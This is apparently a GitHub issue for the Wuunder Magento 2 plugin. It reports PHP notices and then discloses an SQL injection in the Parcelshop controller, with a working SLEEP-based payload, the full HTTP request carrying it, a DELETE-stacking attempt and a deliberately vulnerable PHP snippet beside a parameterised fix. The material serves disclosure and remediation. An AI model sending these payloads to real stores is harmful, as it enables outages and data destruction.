wuunder / wuunder-webshopplugin-magento2
Home Page: https://wearewuunder.com/en/information-request-magento/
License: BSD 3-Clause "New" or "Revised" License
After installing, the order grid in the backend is broken and displays the following message:
Notice: Undefined index: label_id in /vendor/wuunder/magento2-connector/Ui/Component/Listing/Column/Status.php on line 45
On the checkout page, at the shipping step, parcelshop.js throws an error:
VM21357:1 Uncaught SyntaxError: Unexpected token < in JSON at position 0
at JSON.parse ()
at _markupParcelshopAddress (parcelshop.js:153)
at Object.success (parcelshop.js:59)
at fire (jquery.js:3232)
at Object.fireWith [as resolveWith] (jquery.js:3362)
at done (jquery.js:9840)
at XMLHttpRequest.callback (jquery.js:10311)
That is because the parcelshopData that is passed to JSON.parse contains the following error:
Fatal error: Uncaught Exception: Notice: Undefined variable: address in /vendor/wuunder/magento2-connector/Controller/Index/Parcelshop.php on line 179 in vendor/magento/framework/App/ErrorHandler.php on line 61
During a QA review we found a possible SQL injection flaw in the Parcelshop controller. SQL queries are being built using bare string concatenation, with no escaping at all.
We went digging deeper and tried several methods to abuse the security flaw. Here are our findings.
We managed to build a SQL Sleep Injection query like the following:
SELECT * FROM wuunder_quote_id WHERE quote_id = '' AND CASE 5 WHEN 5 THEN SLEEP(60) END OR ''
We managed to increase the response time of the request by 60 seconds. Imagine executing this at a larger scale.
POST http://www.example.com/wuunder/index/parcelshop/setParcelshopId
Connection: keep-alive
Accept: */*
Origin: http://www.example.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://www.example.com/checkout/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,nl;q=0.8,de;q=0.7,fr;q=0.6,es;q=0.5
Cookie: ...
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
parcelshopId=cb927986-6281-4f4a-b2f0-ddfc16ce0642&quoteId='AND%20CASE%205%20WHEN%205%20THEN%20SLEEP%2860%29%20END%20OR%20'
We also managed to build a SQL Update Injection query like the following:
SELECT * FROM wuunder_quote_id WHERE quote_id = '' OR 1=1; DELETE FROM sales_order WHERE order_id != ''
Luckily, Magento has you covered, because fetchAll() and query() are not able to execute multiple queries.
I will provide a solution this week. For now I suggest disabling the parcel functionality and blocking the controller at the web server level.
NGINX
location /wuunder/index/parcelshop {
deny all;
}
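The following is an added illustration, not code from the plugin or from the reporter: it places the string-concatenation pattern the report describes next to a parameterised lookup through Magento's DB adapter, using the table and column names from the report (wuunder_quote_id, quote_id). The class name ParcelshopQuoteLookup, the method names and the numeric check on the quote id are assumptions for the example; `ResourceConnection`, `select()->from()->where('… = ?', $value)` and `fetchAll()` are the standard Magento 2 framework APIs.

```php
<?php
// Added example (not the plugin's own code). Contrasts the concatenation
// pattern from the report with a bound-parameter query. Assumes a Magento 2
// environment where \Magento\Framework\App\ResourceConnection is injected.

use Magento\Framework\App\ResourceConnection;

class ParcelshopQuoteLookup
{
    /** @var ResourceConnection */
    private $resource;

    public function __construct(ResourceConnection $resource)
    {
        $this->resource = $resource;
    }

    // VULNERABLE: the request value is spliced into the SQL text.
    // With quoteId = "' AND CASE 5 WHEN 5 THEN SLEEP(60) END OR '" the
    // statement becomes the time-based payload quoted in the report:
    //   SELECT * FROM wuunder_quote_id WHERE quote_id = '' AND CASE 5 WHEN 5
    //   THEN SLEEP(60) END OR ''
    // Stacked statements ("; DELETE ...") are refused by fetchAll(), as the
    // report notes, but the boolean/time-based injection still goes through.
    public function findVulnerable(string $quoteId): array
    {
        $connection = $this->resource->getConnection();
        $table = $this->resource->getTableName('wuunder_quote_id');
        $sql = "SELECT * FROM {$table} WHERE quote_id = '" . $quoteId . "'";
        return $connection->fetchAll($sql);
    }

    // FIXED: the value is bound with a "?" placeholder, so the adapter quotes
    // it and it can only ever be compared as data, never parsed as SQL.
    // The ctype_digit() guard is an added assumption (Magento quote ids are
    // integer entity ids) that rejects malformed input before it reaches the
    // database at all.
    public function findSafe(string $quoteId): array
    {
        if (!ctype_digit($quoteId)) {
            throw new \InvalidArgumentException('quoteId must be a positive integer');
        }
        $connection = $this->resource->getConnection();
        $select = $connection->select()
            ->from($this->resource->getTableName('wuunder_quote_id'))
            ->where('quote_id = ?', (int) $quoteId);
        return $connection->fetchAll($select);
    }
}
```

Binding the parameter (rather than escaping the string by hand) is what closes the time-based variant; the single-statement restriction of fetchAll() and query() only protects against the stacked DELETE, not against payloads that live inside the one SELECT.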